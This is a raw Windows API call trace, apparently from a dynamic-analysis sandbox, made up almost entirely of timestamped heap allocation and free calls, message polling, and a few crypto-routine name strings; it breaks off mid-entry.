1 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0128.448] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50818 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.448] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0128.449] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0128.449] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0128.449] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0128.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b18 [0128.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0128.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0128.449] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.449] GetLastError () returned 0x0 [0128.449] SetLastError (dwErrCode=0x0) [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef20 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0128.450] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f010 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0128.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.450] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0128.451] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0128.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0128.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0128.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0128.452] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.452] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0128.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0128.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0128.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0128.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0128.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0128.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0128.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0128.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0128.453] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0128.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0128.454] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0128.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0128.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0128.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0128.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0128.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0128.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.457] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0128.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0128.457] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b18 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.457] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0128.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0128.457] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0128.458] HeapFree (in: hHeap=0x970000, 